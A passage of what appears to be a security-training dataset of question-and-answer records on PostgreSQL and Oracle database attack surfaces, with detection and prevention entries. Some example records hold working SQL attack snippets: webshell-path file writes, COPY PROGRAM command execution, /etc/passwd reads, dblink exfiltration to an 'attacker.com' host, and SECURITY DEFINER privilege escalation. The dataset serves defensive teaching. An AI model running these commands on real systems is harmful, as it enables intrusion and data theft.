Combined with SQL injection, this leads to server compromise.\n\nCommon attack vectors include:\n- COPY PROGRAM for command execution\n- Webshell writing to web directories\n- Configuration file reading\n- SSH key injection to .ssh/authorized_keys", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142968Z", "updated_at": "2025-12-17T19:35:42.142968Z"} +{"id": "trtp-dfc6b4db689a", "instruction": "How can adversaries exploit PostgreSQL COPY Command Exploitation?", "output": "Attack techniques involving PostgreSQL COPY Command Exploitation:\n\n- COPY PROGRAM for command execution\n- Webshell writing to web directories\n- Configuration file reading\n- SSH key injection to .ssh/authorized_keys\n\nDefenders can detect these attacks by:\n- COPY TO/FROM file operations\n- COPY PROGRAM usage\n- Superuser query execution", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142993Z", "updated_at": "2025-12-17T19:35:42.142993Z"} +{"id": "trtp-3a8f4539fa6e", "instruction": "What log entries indicate PostgreSQL COPY Command Exploitation attacks?", "output": "Methods for detecting PostgreSQL COPY Command Exploitation attacks or anomalies:\n\n- COPY TO/FROM 
file operations\n- COPY PROGRAM usage\n- Superuser query execution\n- Unusual file access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143012Z", "updated_at": "2025-12-17T19:35:42.143012Z"} +{"id": "trtp-9d6843d7e2a3", "instruction": "What security controls mitigate PostgreSQL COPY Command Exploitation risks?", "output": "Security controls and preventive measures for PostgreSQL COPY Command Exploitation:\n\n- Restrict superuser access\n- Don't grant COPY privileges to application users\n- Monitor for COPY PROGRAM usage\n- Filesystem permissions limiting postgres user\n\nCOPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. 
Combined with SQL injection, this leads to server compromise.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143025Z", "updated_at": "2025-12-17T19:35:42.143025Z"} +{"id": "trtp-f8584b1fa6e8", "instruction": "Show an example of PostgreSQL COPY Command Exploitation.", "output": "Example of PostgreSQL COPY Command Exploitation:\n\n```sql\n-- Write file:\nCOPY (SELECT '') TO '/var/www/html/shell.php';\n\n-- Execute command (9.3+):\nCOPY cmd FROM PROGRAM 'whoami';\n\n-- Read file:\nCREATE TABLE etc_passwd(content TEXT);\nCOPY etc_passwd FROM '/etc/passwd';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.143035Z", "updated_at": "2025-12-17T19:35:42.143035Z"} +{"id": "trtp-d1216cb8cb6e", "instruction": "What is PostgreSQL Large Objects and why is it important for database security?", "output": "PostgreSQL large objects (lo) store binary data in chunks. They can be used to read and write files, providing an alternative to COPY for file operations. Large object functions enable byte-level file manipulation.\n\nSecurity Relevance: Large objects provide file access without COPY. Attackers can import files for reading or export data to write files. 
This technique works even when COPY is restricted.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145425Z", "updated_at": "2025-12-17T19:35:42.145425Z"} +{"id": "trtp-a6023b7b3141", "instruction": "What are the key components of PostgreSQL Large Objects?", "output": "PostgreSQL Large Objects consists of the following key components:\n\n- lo_import/lo_export functions\n- lo_create/lo_open/lo_close\n- pg_largeobject catalog\n- File I/O through large objects\n- OID references", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145449Z", "updated_at": "2025-12-17T19:35:42.145449Z"} +{"id": "trtp-806f1dcd097b", "instruction": "From a security perspective, why should defenders understand PostgreSQL Large Objects?", "output": "Large objects provide file access without COPY. Attackers can import files for reading or export data to write files. 
This technique works even when COPY is restricted.\n\nCommon attack vectors include:\n- File reading via lo_import\n- File writing via lo_export\n- Binary file manipulation\n- Bypassing COPY restrictions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145463Z", "updated_at": "2025-12-17T19:35:42.145463Z"} +{"id": "trtp-1f5dacba5b5a", "instruction": "What are common attack techniques involving PostgreSQL Large Objects?", "output": "Attack techniques involving PostgreSQL Large Objects:\n\n- File reading via lo_import\n- File writing via lo_export\n- Binary file manipulation\n- Bypassing COPY restrictions\n\nDefenders can detect these attacks by:\n- Large object function calls\n- Unusual pg_largeobject access\n- lo_export to unexpected paths", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145496Z", "updated_at": "2025-12-17T19:35:42.145496Z"} +{"id": "trtp-7a45071c3445", "instruction": "What log entries indicate PostgreSQL Large Objects attacks?", "output": "Methods for detecting PostgreSQL Large Objects attacks or anomalies:\n\n- Large object function calls\n- Unusual pg_largeobject access\n- lo_export to unexpected paths\n- Large object creation patterns", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145508Z", "updated_at": "2025-12-17T19:35:42.145508Z"} +{"id": "trtp-4084d8544d5f", "instruction": "What security controls mitigate PostgreSQL Large Objects risks?", "output": "Security controls and preventive measures for PostgreSQL Large Objects:\n\n- Restrict large object functions\n- Monitor pg_largeobject catalog access\n- Limit superuser access\n- Audit file operation functions\n\nLarge objects provide file access without COPY. Attackers can import files for reading or export data to write files. This technique works even when COPY is restricted.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145521Z", "updated_at": "2025-12-17T19:35:42.145521Z"} +{"id": "trtp-13514e409607", "instruction": "Provide a code example for PostgreSQL Large Objects.", "output": "Example of PostgreSQL Large Objects:\n\n```sql\n-- Read file via large object:\nSELECT lo_import('/etc/passwd');\nSELECT * FROM pg_largeobject WHERE loid = ;\n\n-- Write file:\nSELECT lo_from_bytea(0, 'malicious content');\nSELECT lo_export(, '/tmp/output.txt');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", 
"source_id": "database-security-postgresql-postgresql-large-objects", "license": "original", "retrieved_at": "2025-12-17T19:35:42.145394Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.145531Z", "updated_at": "2025-12-17T19:35:42.145531Z"} +{"id": "trtp-c4ca12f4a500", "instruction": "Describe PostgreSQL Extension Exploitation and its role in database security.", "output": "PostgreSQL extensions add functionality through shared libraries. Malicious extensions can execute arbitrary code. Even legitimate extensions may have security implications that attackers exploit.\n\nSecurity Relevance: Extensions run with database server privileges. Malicious extensions provide persistent code execution. Some built-in extensions like dblink enable network operations that can be abused.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147764Z", "updated_at": "2025-12-17T19:35:42.147764Z"} +{"id": "trtp-05cd6ae0bc53", "instruction": "Describe the technical aspects of PostgreSQL Extension Exploitation.", "output": "PostgreSQL Extension Exploitation consists of the following key components:\n\n- CREATE EXTENSION command\n- Extension shared libraries\n- adminpack extension\n- dblink extension\n- pg_stat_statements", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": 
"original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147784Z", "updated_at": "2025-12-17T19:35:42.147784Z"} +{"id": "trtp-22d25cec4e30", "instruction": "From a security perspective, why should defenders understand PostgreSQL Extension Exploitation?", "output": "Extensions run with database server privileges. Malicious extensions provide persistent code execution. Some built-in extensions like dblink enable network operations that can be abused.\n\nCommon attack vectors include:\n- dblink for OOB data exfiltration\n- adminpack for file operations\n- Custom extension code execution\n- Extension privilege escalation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147817Z", "updated_at": "2025-12-17T19:35:42.147817Z"} +{"id": "trtp-6ccc97a244a2", "instruction": "How do attackers abuse PostgreSQL Extension Exploitation?", "output": "Attack techniques involving PostgreSQL Extension Exploitation:\n\n- dblink for OOB data exfiltration\n- adminpack for file operations\n- Custom extension code execution\n- Extension privilege escalation\n\nDefenders can detect these attacks by:\n- CREATE EXTENSION events\n- dblink connections to external hosts\n- Unknown extension loading", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": 
"database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147832Z", "updated_at": "2025-12-17T19:35:42.147832Z"} +{"id": "trtp-099b00be401d", "instruction": "What log entries indicate PostgreSQL Extension Exploitation attacks?", "output": "Methods for detecting PostgreSQL Extension Exploitation attacks or anomalies:\n\n- CREATE EXTENSION events\n- dblink connections to external hosts\n- Unknown extension loading\n- Extension-related function calls", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147843Z", "updated_at": "2025-12-17T19:35:42.147843Z"} +{"id": "trtp-5e068e588372", "instruction": "What are best practices for preventing PostgreSQL Extension Exploitation?", "output": "Security controls and preventive measures for PostgreSQL Extension Exploitation:\n\n- Restrict CREATE EXTENSION privilege\n- Audit enabled extensions\n- Monitor external connections from dblink\n- Remove unnecessary extensions\n\nExtensions run with database server privileges. Malicious extensions provide persistent code execution. 
Some built-in extensions like dblink enable network operations that can be abused.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147855Z", "updated_at": "2025-12-17T19:35:42.147855Z"} +{"id": "trtp-d5e0a12e1666", "instruction": "What is the syntax for PostgreSQL Extension Exploitation?", "output": "Example of PostgreSQL Extension Exploitation:\n\n```sql\n-- Enable dblink for network access:\nCREATE EXTENSION dblink;\n\n-- Use dblink for out-of-band data exfiltration:\nSELECT * FROM dblink('host=attacker.com user=x password=x', 'SELECT version()') AS t(v TEXT);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-extension-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.147734Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.147865Z", "updated_at": "2025-12-17T19:35:42.147865Z"} +{"id": "trtp-21273c8f043e", "instruction": "Explain PostgreSQL pg_hba.conf Security from a security perspective.", "output": "pg_hba.conf (host-based authentication) controls client authentication in PostgreSQL. Misconfigurations can allow unauthorized access, while proper configuration is essential for database security.\n\nSecurity Relevance: pg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. 
First-match ordering can bypass intended restrictions.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150119Z", "updated_at": "2025-12-17T19:35:42.150119Z"} +{"id": "trtp-fb4da6f15b50", "instruction": "What are the key components of PostgreSQL pg_hba.conf Security?", "output": "PostgreSQL pg_hba.conf Security consists of the following key components:\n\n- Connection type (local, host, hostssl)\n- Database and user matching\n- Address/CIDR specifications\n- Authentication methods (md5, scram, trust)\n- Rule ordering", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150153Z", "updated_at": "2025-12-17T19:35:42.150153Z"} +{"id": "trtp-7506ac35f259", "instruction": "From a security perspective, why should defenders understand PostgreSQL pg_hba.conf Security?", "output": "pg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. 
First-match ordering can bypass intended restrictions.\n\nCommon attack vectors include:\n- Exploiting trust authentication rules\n- Bypassing through overly broad rules\n- Rule order manipulation\n- MD5 password hash interception", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150168Z", "updated_at": "2025-12-17T19:35:42.150168Z"} +{"id": "trtp-ce1799c95ec3", "instruction": "What threats are associated with PostgreSQL pg_hba.conf Security?", "output": "Attack techniques involving PostgreSQL pg_hba.conf Security:\n\n- Exploiting trust authentication rules\n- Bypassing through overly broad rules\n- Rule order manipulation\n- MD5 password hash interception\n\nDefenders can detect these attacks by:\n- pg_hba.conf file monitoring\n- Authentication method audit\n- Connection source analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150182Z", "updated_at": "2025-12-17T19:35:42.150182Z"} +{"id": "trtp-287b780ab89b", "instruction": "How do you detect exploitation of PostgreSQL pg_hba.conf Security?", "output": "Methods for detecting PostgreSQL pg_hba.conf Security attacks or anomalies:\n\n- pg_hba.conf file monitoring\n- Authentication method 
audit\n- Connection source analysis\n- Failed authentication attempts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150194Z", "updated_at": "2025-12-17T19:35:42.150194Z"} +{"id": "trtp-3926d1471f9a", "instruction": "What are best practices for preventing PostgreSQL pg_hba.conf Security?", "output": "Security controls and preventive measures for PostgreSQL pg_hba.conf Security:\n\n- Never use 'trust' in production\n- Use scram-sha-256 over md5\n- Limit connection sources to required IPs\n- Review pg_hba.conf regularly\n\npg_hba.conf misconfigurations are common. 'trust' authentication allows passwordless access. Overly broad address rules enable unauthorized connections. 
First-match ordering can bypass intended restrictions.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150228Z", "updated_at": "2025-12-17T19:35:42.150228Z"} +{"id": "trtp-0fd9b05ad51f", "instruction": "Show an example of PostgreSQL pg_hba.conf Security.", "output": "Example of PostgreSQL pg_hba.conf Security:\n\n```sql\n# Dangerous: trust from any host\nhost all all 0.0.0.0/0 trust\n\n# Secure: require scram-sha-256 authentication\nhost all all 192.168.1.0/24 scram-sha-256\nhost all all ::1/128 scram-sha-256\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-pg_hba.conf-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.150089Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.150238Z", "updated_at": "2025-12-17T19:35:42.150238Z"} +{"id": "trtp-4a7b93e1a29f", "instruction": "Explain PostgreSQL Privilege Escalation from a security perspective.", "output": "PostgreSQL privilege escalation exploits trust relationships, function security contexts, or role memberships to gain higher privileges. Security definer functions and role inheritance are common escalation vectors.\n\nSecurity Relevance: SECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. 
Role membership graphs can provide unexpected privilege paths.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152423Z", "updated_at": "2025-12-17T19:35:42.152423Z"} +{"id": "trtp-bb24c98af180", "instruction": "What elements make up PostgreSQL Privilege Escalation?", "output": "PostgreSQL Privilege Escalation consists of the following key components:\n\n- SECURITY DEFINER functions\n- Role inheritance\n- superuser role\n- DEFAULT PRIVILEGES\n- Function ownership", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152446Z", "updated_at": "2025-12-17T19:35:42.152446Z"} +{"id": "trtp-2a05aca02634", "instruction": "Why is PostgreSQL Privilege Escalation important for database security?", "output": "SECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. 
Role membership graphs can provide unexpected privilege paths.\n\nCommon attack vectors include:\n- Exploit SECURITY DEFINER functions\n- Role membership chain exploitation\n- DEFAULT PRIVILEGES abuse\n- Function injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152461Z", "updated_at": "2025-12-17T19:35:42.152461Z"} +{"id": "trtp-7d68122238cc", "instruction": "How can adversaries exploit PostgreSQL Privilege Escalation?", "output": "Attack techniques involving PostgreSQL Privilege Escalation:\n\n- Exploit SECURITY DEFINER functions\n- Role membership chain exploitation\n- DEFAULT PRIVILEGES abuse\n- Function injection\n\nDefenders can detect these attacks by:\n- SECURITY DEFINER function auditing\n- Role membership changes\n- Privilege escalation attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152499Z", "updated_at": "2025-12-17T19:35:42.152499Z"} +{"id": "trtp-b89b1299ed94", "instruction": "What log entries indicate PostgreSQL Privilege Escalation attacks?", "output": "Methods for detecting PostgreSQL Privilege Escalation attacks or anomalies:\n\n- SECURITY DEFINER function auditing\n- Role membership changes\n- Privilege 
escalation attempts\n- Function execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152511Z", "updated_at": "2025-12-17T19:35:42.152511Z"} +{"id": "trtp-0fc42e8058c3", "instruction": "What are best practices for preventing PostgreSQL Privilege Escalation?", "output": "Security controls and preventive measures for PostgreSQL Privilege Escalation:\n\n- Audit SECURITY DEFINER functions\n- Minimize role membership\n- Use SECURITY INVOKER where possible\n- Input validation in elevated functions\n\nSECURITY DEFINER functions execute with owner's privileges. Improperly written functions can be exploited to escalate. 
Role membership graphs can provide unexpected privilege paths.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152523Z", "updated_at": "2025-12-17T19:35:42.152523Z"} +{"id": "trtp-0a631d05069a", "instruction": "What is the syntax for PostgreSQL Privilege Escalation?", "output": "Example of PostgreSQL Privilege Escalation:\n\n```sql\n-- Vulnerable SECURITY DEFINER function:\nCREATE OR REPLACE FUNCTION admin_query(query TEXT)\nRETURNS VOID AS $$\nBEGIN\n EXECUTE query; -- Executes with function owner's privileges\nEND;\n$$ LANGUAGE plpgsql SECURITY DEFINER;\n\n-- Exploitation:\nSELECT admin_query('ALTER USER attacker WITH SUPERUSER');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-privilege-escalation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.152395Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.152548Z", "updated_at": "2025-12-17T19:35:42.152548Z"} +{"id": "trtp-0b65e71cd484", "instruction": "Describe Oracle UTL_HTTP and Network Packages and its role in database security.", "output": "Oracle's UTL_HTTP, UTL_TCP, and related packages enable network operations from the database. Attackers use these for out-of-band data exfiltration, SSRF attacks, and establishing reverse connections.\n\nSecurity Relevance: Network packages enable database-initiated connections. 
Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. ACLs are often misconfigured.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154728Z", "updated_at": "2025-12-17T19:35:42.154728Z"} +{"id": "trtp-9842ec86cb22", "instruction": "What elements make up Oracle UTL_HTTP and Network Packages?", "output": "Oracle UTL_HTTP and Network Packages consists of the following key components:\n\n- UTL_HTTP for HTTP requests\n- UTL_TCP for raw TCP connections\n- UTL_SMTP for email sending\n- HTTPURITYPE for URL access\n- Access Control Lists (ACL)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154748Z", "updated_at": "2025-12-17T19:35:42.154748Z"} +{"id": "trtp-b8050713fe0d", "instruction": "How can Oracle UTL_HTTP and Network Packages lead to database security incidents?", "output": "Network packages enable database-initiated connections. Combined with SQL injection, attackers can exfiltrate data via HTTP, send SMTP messages, or establish command channels. 
ACLs are often misconfigured.\n\nCommon attack vectors include:\n- Data exfiltration via HTTP callback\n- SSRF through UTL_HTTP\n- Email sending for social engineering\n- Reverse TCP connections", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154764Z", "updated_at": "2025-12-17T19:35:42.154764Z"} +{"id": "trtp-23742522402c", "instruction": "How can adversaries exploit Oracle UTL_HTTP and Network Packages?", "output": "Attack techniques involving Oracle UTL_HTTP and Network Packages:\n\n- Data exfiltration via HTTP callback\n- SSRF through UTL_HTTP\n- Email sending for social engineering\n- Reverse TCP connections\n\nDefenders can detect these attacks by:\n- UTL_HTTP/UTL_TCP execution\n- Outbound connections from database server\n- ACL grant changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-oracle-oracle-utl_http-and-network-packages", "license": "original", "retrieved_at": "2025-12-17T19:35:42.154693Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.154777Z", "updated_at": "2025-12-17T19:35:42.154777Z"} +{"id": "trtp-ec94064265fd", "instruction": "What should analysts look for when monitoring for Oracle UTL_HTTP and Network Packages?", "output": "Methods for detecting Oracle UTL_HTTP and Network Packages attacks or anomalies:\n\n- UTL_HTTP/UTL_TCP execution\n- Outbound connections from database 
